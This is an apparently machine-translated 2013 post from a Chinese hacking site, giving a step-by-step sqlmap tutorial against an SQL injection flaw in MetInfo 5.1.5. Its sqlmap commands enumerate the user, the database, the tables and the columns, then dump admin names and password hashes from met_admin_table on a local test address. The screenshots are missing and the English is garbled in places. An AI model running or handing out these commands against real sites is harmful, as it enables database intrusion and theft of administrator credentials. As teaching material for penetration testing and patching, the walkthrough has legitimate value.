Use Sqlmap to test MetInfo enterprise website management system MySql injection vulnerability-vulnerability warning-the black bar safety net

2013-07-18T00:00:00
ID MYHACK58:62201339711
Type myhack58
Reporter 佚名
Modified 2013-07-18T00:00:00

Description

The last fork fork tell Sqlmap simple injection access database tutorial, this time we talk about the MySql database

MetInfo is a powerful enterprise web site management system, using PHP+Mysql architecture.

Fork fork download The is MetInfo 5.1.5 the free version, let's not pick, not analysis of the source code, The direct loss to the WVS inside sweep

! ScreenClip

Find the injection point, open our backtrack5,run Sqlmap artifact

! ScreenClip [2]

Get the current user name,enter the command:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-user

!

Get the current database name, enter the command:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –current-db

! ScreenClip [4]

Get the database name: met

!

The columns of the database table name, enter the command: python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –tables-D “met“successfully”met”database table name as shown below:

! ScreenClip [6]

Column of the admin table field, enter the command: python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –columns-T “met_admin_table“ -D “met”

! ScreenClip [7]

The figure above shows a successful acquisition met_admin_table table fields, the following dump shows the admin_name and admin_pass content, enter the command: python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump-C “admin_pass,admin_name” -T “met_admin_table” -D “met”